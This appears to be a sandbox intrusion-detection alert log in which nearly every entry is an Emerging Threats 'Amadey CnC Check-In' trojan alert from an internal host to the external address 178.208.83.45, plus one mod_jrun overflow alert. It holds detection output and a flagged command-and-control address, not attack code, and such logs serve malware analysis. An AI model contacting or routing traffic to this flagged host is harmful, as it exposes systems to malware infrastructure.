                          11/12/21-22:23:35.369415TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.4178.208.83.45
                          11/12/21-22:23:35.669938TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.4178.208.83.45
                          11/12/21-22:23:35.822404TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.4178.208.83.45
                          11/12/21-22:23:35.977914TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.4178.208.83.45
                          11/12/21-22:23:36.150866TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.4178.208.83.45
                          11/12/21-22:23:36.307987TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.4178.208.83.45
                          11/12/21-22:23:36.480122TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.4178.208.83.45
                          11/12/21-22:23:36.640967TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.4178.208.83.45
                          11/12/21-22:23:36.807454TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.4178.208.83.45
                          11/12/21-22:23:36.964043TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.4178.208.83.45
                          11/12/21-22:23:37.419045TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.4178.208.83.45
                          11/12/21-22:23:37.589438TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.4178.208.83.45
                          11/12/21-22:23:37.748758TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.4178.208.83.45
                          11/12/21-22:23:37.916664TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.4178.208.83.45
                          11/12/21-22:23:38.084495TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.4178.208.83.45
                          11/12/21-22:23:38.248426TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.4178.208.83.45
                          11/12/21-22:23:38.417346TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.4178.208.83.45
                          11/12/21-22:23:38.588937TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.4178.208.83.45
                          11/12/21-22:23:38.759351TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.4178.208.83.45
                          11/12/21-22:23:38.891987TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.4178.208.83.45
                          11/12/21-22:23:39.063790TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.4178.208.83.45
                          11/12/21-22:23:39.229237TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.4178.208.83.45
                          11/12/21-22:23:39.384614TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.4178.208.83.45
                          11/12/21-22:23:39.540863TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.4178.208.83.45
                          11/12/21-22:23:39.701808TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.4178.208.83.45
                          11/12/21-22:23:39.870584TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.4178.208.83.45
                          11/12/21-22:23:40.001981TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.4178.208.83.45
                          11/12/21-22:23:40.169700TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.4178.208.83.45
                          11/12/21-22:23:40.337696TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.4178.208.83.45
                          11/12/21-22:23:40.510149TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.4178.208.83.45
                          11/12/21-22:23:40.666706TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.4178.208.83.45
                          11/12/21-22:23:40.825270TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.4178.208.83.45
                          11/12/21-22:23:40.994213TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.4178.208.83.45
                          11/12/21-22:23:41.150445TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.4178.208.83.45
                          11/12/21-22:23:41.321176TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.4178.208.83.45
                          11/12/21-22:23:41.479825TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.4178.208.83.45
                          11/12/21-22:23:41.654846TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.4178.208.83.45
                          11/12/21-22:23:41.825675TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.4178.208.83.45
                          11/12/21-22:23:41.979407TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.4178.208.83.45
                          11/12/21-22:23:42.134851TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.4178.208.83.45
                          11/12/21-22:23:42.308564TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.4178.208.83.45
                          11/12/21-22:23:42.464411TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.4178.208.83.45
                          11/12/21-22:23:42.620807TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.4178.208.83.45
                          11/12/21-22:23:42.777404TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.4178.208.83.45
                          11/12/21-22:23:42.932312TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.4178.208.83.45
                          11/12/21-22:23:43.327604TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.4178.208.83.45
                          11/12/21-22:23:43.469910TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.4178.208.83.45
                          11/12/21-22:23:43.636862TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.4178.208.83.45
                          11/12/21-22:23:43.791894TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.4178.208.83.45
                          11/12/21-22:23:44.602357TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.4178.208.83.45
                          11/12/21-22:23:44.763657TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.4178.208.83.45
                          11/12/21-22:23:44.933183TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.4178.208.83.45
                          11/12/21-22:23:45.092194TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.4178.208.83.45
                          11/12/21-22:23:45.261551TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.4178.208.83.45
                          11/12/21-22:23:45.392957TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.4178.208.83.45
                          11/12/21-22:23:45.568892TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.4178.208.83.45
                          11/12/21-22:23:45.935548TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.4178.208.83.45
                          11/12/21-22:23:46.119459TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.4178.208.83.45
                          11/12/21-22:23:46.318734TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.4178.208.83.45
                          11/12/21-22:23:46.479213TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.4178.208.83.45
                          11/12/21-22:23:46.651497TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.4178.208.83.45
                          11/12/21-22:23:46.814727TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.4178.208.83.45
                          11/12/21-22:23:47.417337TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.4178.208.83.45
                          11/12/21-22:23:47.606173TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.4178.208.83.45
                          11/12/21-22:23:48.120229TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.4178.208.83.45
                          11/12/21-22:23:49.416085TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.4178.208.83.45
                          11/12/21-22:23:49.579570TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.4178.208.83.45
                          11/12/21-22:23:49.746019TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.4178.208.83.45
                          11/12/21-22:23:49.902368TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.4178.208.83.45
                          11/12/21-22:23:50.061553TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.4178.208.83.45
                          11/12/21-22:23:50.237104TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.4178.208.83.45
                          11/12/21-22:23:50.421727TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.4178.208.83.45
                          11/12/21-22:23:50.564844TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.4178.208.83.45
                          11/12/21-22:23:50.733889TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.4178.208.83.45
                          11/12/21-22:23:50.901208TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.4178.208.83.45
                          11/12/21-22:23:51.060721TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.4178.208.83.45
                          11/12/21-22:23:51.238609TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.4178.208.83.45
                          11/12/21-22:23:51.377135TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.4178.208.83.45
                          11/12/21-22:23:51.541973TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.4178.208.83.45
                          11/12/21-22:23:51.706533TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.4178.208.83.45
                          11/12/21-22:23:51.849318TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.4178.208.83.45
                          11/12/21-22:23:52.012183TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.4178.208.83.45
                          11/12/21-22:23:52.169316TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.4178.208.83.45
                          11/12/21-22:23:52.341677TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.4178.208.83.45
                          11/12/21-22:23:52.502801TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.4178.208.83.45
                          11/12/21-22:23:52.669173TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.4178.208.83.45
                          11/12/21-22:23:52.843248TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.4178.208.83.45
                          11/12/21-22:23:53.004032TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.4178.208.83.45
                          11/12/21-22:23:53.167528TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.4178.208.83.45
                          11/12/21-22:23:53.349231TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.4178.208.83.45
                          11/12/21-22:23:53.511848TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.4178.208.83.45
                          11/12/21-22:23:53.679697TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.4178.208.83.45
                          11/12/21-22:23:54.026204TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.4178.208.83.45
                          11/12/21-22:23:54.187715TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.4178.208.83.45
                          11/12/21-22:23:54.342771TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.4178.208.83.45
                          11/12/21-22:23:54.562739TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.4178.208.83.45
                          11/12/21-22:23:54.750503TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.4178.208.83.45
                          11/12/21-22:23:54.919496TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.4178.208.83.45
                          11/12/21-22:23:55.114799TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.4178.208.83.45
                          11/12/21-22:23:55.338565TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.4178.208.83.45
                          11/12/21-22:23:55.504213TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.4178.208.83.45
                          11/12/21-22:23:55.699478TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.4178.208.83.45
                          11/12/21-22:23:55.874059TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.4178.208.83.45
                          11/12/21-22:23:56.120997TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.4178.208.83.45
                          11/12/21-22:23:56.170786TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4996680192.168.2.4178.208.83.45
                          11/12/21-22:23:56.269234TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.4178.208.83.45
                          11/12/21-22:23:56.462102TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.4178.208.83.45
                          11/12/21-22:23:56.656429TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.4178.208.83.45
                          11/12/21-22:23:56.855656TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.4178.208.83.45
                          11/12/21-22:23:57.019174TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.4178.208.83.45
                          11/12/21-22:23:57.161224TCP2027700ET TROJAN Amadey CnC Check-In4997280192.168.2.4178.208.83.45
                          11/12/21-22:23:57.408649TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.4178.208.83.45
                          11/12/21-22:23:57.653405TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.4178.208.83.45
                          11/12/21-22:23:57.801731TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.4178.208.83.45
                          11/12/21-22:23:57.970317TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.4178.208.83.45
                          11/12/21-22:23:58.138899TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.4178.208.83.45
                          11/12/21-22:23:58.312208TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.4178.208.83.45
                          11/12/21-22:23:58.493806TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.4178.208.83.45
                          11/12/21-22:23:58.679102TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.4178.208.83.45
                          11/12/21-22:23:58.839951TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.4178.208.83.45
                          11/12/21-22:23:59.006320TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.4178.208.83.45
                          11/12/21-22:23:59.142947TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.4178.208.83.45
                          11/12/21-22:23:59.314810TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.4178.208.83.45
                          11/12/21-22:23:59.481609TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.4178.208.83.45
                          11/12/21-22:23:59.636147TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.4178.208.83.45
                          11/12/21-22:23:59.793644TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.4178.208.83.45
                          11/12/21-22:23:59.949820TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.4178.208.83.45
                          11/12/21-22:24:00.106127TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.4178.208.83.45
                          11/12/21-22:24:00.269898TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.4178.208.83.45
                          11/12/21-22:24:00.411882TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.4178.208.83.45
                          11/12/21-22:24:00.575884TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.4178.208.83.45
                          11/12/21-22:24:00.737734TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.4178.208.83.45
                          11/12/21-22:24:00.937269TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.4178.208.83.45
                          11/12/21-22:24:01.105939TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.4178.208.83.45
                          11/12/21-22:24:01.262348TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.4178.208.83.45
                          11/12/21-22:24:01.420887TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.4178.208.83.45
                          11/12/21-22:24:01.578302TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.4178.208.83.45
                          11/12/21-22:24:01.763459TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.4178.208.83.45
                          11/12/21-22:24:01.938663TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.4178.208.83.45
                          11/12/21-22:24:02.190659TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.4178.208.83.45
                          11/12/21-22:24:02.356618TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.4178.208.83.45
                          11/12/21-22:24:02.531312TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.4178.208.83.45
                          11/12/21-22:24:02.714186TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.4178.208.83.45
                          11/12/21-22:24:02.873610TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.4178.208.83.45
                          11/12/21-22:24:03.058554TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.4178.208.83.45
                          11/12/21-22:24:03.240451TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.4178.208.83.45
                          11/12/21-22:24:03.425556TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.4178.208.83.45
                          11/12/21-22:24:03.590533TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.4178.208.83.45
                          11/12/21-22:24:03.764974TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.4178.208.83.45
                          11/12/21-22:24:03.936435TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.4178.208.83.45
                          11/12/21-22:24:04.096789TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.4178.208.83.45
                          11/12/21-22:24:04.262406TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.4178.208.83.45
                          11/12/21-22:24:04.418118TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.4178.208.83.45
                          11/12/21-22:24:04.573521TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.4178.208.83.45
                          11/12/21-22:24:04.754512TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.4178.208.83.45
                          11/12/21-22:24:04.992624TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.4178.208.83.45
                          11/12/21-22:24:05.313631TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.4178.208.83.45
                          11/12/21-22:24:05.466169TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.4178.208.83.45
                          11/12/21-22:24:05.636333TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.4178.208.83.45
                          11/12/21-22:24:05.809630TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.4178.208.83.45
                          11/12/21-22:24:06.070840TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.4178.208.83.45
                          11/12/21-22:24:06.738066TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.4178.208.83.45
                          11/12/21-22:24:06.915276TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.4178.208.83.45
                          11/12/21-22:24:07.077226TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.4178.208.83.45
                          11/12/21-22:24:07.366317TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.4178.208.83.45
                          11/12/21-22:24:08.699570TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.4178.208.83.45
                          11/12/21-22:24:09.057309TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.4178.208.83.45
                          11/12/21-22:24:09.220450TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.4178.208.83.45
                          11/12/21-22:24:09.388570TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.4178.208.83.45
                          11/12/21-22:24:09.547375TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.4178.208.83.45
                          11/12/21-22:24:09.716558TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.4178.208.83.45
                          11/12/21-22:24:09.872170TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.4178.208.83.45
                          11/12/21-22:24:10.029753TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.4178.208.83.45
                          11/12/21-22:24:10.184469TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.4178.208.83.45
                          11/12/21-22:24:10.356167TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.4178.208.83.45
                          11/12/21-22:24:10.514760TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.4178.208.83.45
                          11/12/21-22:24:10.669622TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.4178.208.83.45
                          11/12/21-22:24:10.853036TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.4178.208.83.45
                          11/12/21-22:24:11.015225TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.4178.208.83.45
                          11/12/21-22:24:11.176050TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.4178.208.83.45
                          11/12/21-22:24:11.340659TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.4178.208.83.45
                          11/12/21-22:24:11.513751TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.4178.208.83.45
                          11/12/21-22:24:11.688887TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.4178.208.83.45
                          11/12/21-22:24:11.840040TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.4178.208.83.45
                          11/12/21-22:24:11.998836TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.4178.208.83.45
                          11/12/21-22:24:12.153428TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.4178.208.83.45
                          11/12/21-22:24:12.402669TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.4178.208.83.45
                          11/12/21-22:24:13.308990TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.4178.208.83.45
                          11/12/21-22:24:13.468663TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.4178.208.83.45
                          11/12/21-22:24:13.628390TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.4178.208.83.45
                          11/12/21-22:24:13.796095TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.4178.208.83.45
                          11/12/21-22:24:13.965654TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.4178.208.83.45
                          11/12/21-22:24:14.123088TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.4178.208.83.45
                          11/12/21-22:24:14.298931TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.4178.208.83.45
                          11/12/21-22:24:14.468442TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.4178.208.83.45
                          11/12/21-22:24:14.624312TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.4178.208.83.45
                          11/12/21-22:24:14.781005TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.4178.208.83.45
                          11/12/21-22:24:14.934691TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.4178.208.83.45
                          11/12/21-22:24:15.090527TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.4178.208.83.45
                          11/12/21-22:24:15.250424TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.4178.208.83.45
                          11/12/21-22:24:15.418986TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.4178.208.83.45
                          11/12/21-22:24:15.581775TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.4178.208.83.45
                          11/12/21-22:24:15.757513TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.4178.208.83.45
                          11/12/21-22:24:15.919477TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.4178.208.83.45
                          11/12/21-22:24:16.095906TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.4178.208.83.45
                          11/12/21-22:24:16.264165TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.4178.208.83.45
                          11/12/21-22:24:16.420352TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.4178.208.83.45
                          11/12/21-22:24:16.575078TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.4178.208.83.45
                          11/12/21-22:24:16.857429TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.4178.208.83.45
                          11/12/21-22:24:17.014742TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.4178.208.83.45
                          11/12/21-22:24:17.173725TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.4178.208.83.45
                          11/12/21-22:24:17.343234TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.4178.208.83.45
                          11/12/21-22:24:17.513107TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.4178.208.83.45
                          11/12/21-22:24:17.675899TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.4178.208.83.45
                          11/12/21-22:24:17.841648TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.4178.208.83.45
                          11/12/21-22:24:18.013941TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.4178.208.83.45
                          11/12/21-22:24:18.169371TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.4178.208.83.45
                          11/12/21-22:24:18.326132TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.4178.208.83.45
                          11/12/21-22:24:18.482834TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.4178.208.83.45
                          11/12/21-22:24:18.637800TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.4178.208.83.45
                          11/12/21-22:24:18.801804TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.4178.208.83.45
                          11/12/21-22:24:18.969334TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.4178.208.83.45
                          11/12/21-22:24:19.141069TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.4178.208.83.45
                          11/12/21-22:24:19.310212TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.4178.208.83.45
                          11/12/21-22:24:19.467594TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.4178.208.83.45
                          11/12/21-22:24:19.624878TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.4178.208.83.45
                          11/12/21-22:24:19.783322TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.4178.208.83.45
                          11/12/21-22:24:19.950420TCP2027700ET TROJAN Amadey CnC Check-In5013880192.168.2.4178.208.83.45
                          11/12/21-22:24:20.113237TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.4178.208.83.45
                          11/12/21-22:24:20.286033TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.4178.208.83.45
                          11/12/21-22:24:20.451844TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.4178.208.83.45
                          11/12/21-22:24:20.608310TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.4178.208.83.45
                          11/12/21-22:24:20.766396TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.4178.208.83.45
                          11/12/21-22:24:20.934300TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.4178.208.83.45
                          11/12/21-22:24:21.102976TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.4178.208.83.45
                          11/12/21-22:24:21.263261TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.4178.208.83.45
                          11/12/21-22:24:21.448810TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.4178.208.83.45
                          11/12/21-22:24:21.611221TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.4178.208.83.45
                          11/12/21-22:24:21.792020TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.4178.208.83.45
                          11/12/21-22:24:21.953377TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.4178.208.83.45
                          11/12/21-22:24:22.180668TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.4178.208.83.45
                          11/12/21-22:24:22.342566TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.4178.208.83.45
                          11/12/21-22:24:22.497692TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.4178.208.83.45
                          11/12/21-22:24:22.656894TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.4178.208.83.45
                          11/12/21-22:24:22.952967TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.4178.208.83.45
                          11/12/21-22:24:23.108229TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.4178.208.83.45
                          11/12/21-22:24:23.263625TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.4178.208.83.45
                          11/12/21-22:24:23.420593TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.4178.208.83.45
                          11/12/21-22:24:23.596543TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.4178.208.83.45
                          11/12/21-22:24:23.768142TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.4178.208.83.45
                          11/12/21-22:24:24.966934TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.4178.208.83.45
                          11/12/21-22:24:28.201198TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.4178.208.83.45
                          11/12/21-22:24:28.333107TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.4178.208.83.45
                          11/12/21-22:24:28.498807TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.4178.208.83.45
                          11/12/21-22:24:28.655659TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.4178.208.83.45
                          11/12/21-22:24:28.928795TCP2027700ET TROJAN Amadey CnC Check-In5017080192.168.2.4178.208.83.45
                          11/12/21-22:24:29.266881TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.4178.208.83.45
                          11/12/21-22:24:29.461476TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.4178.208.83.45
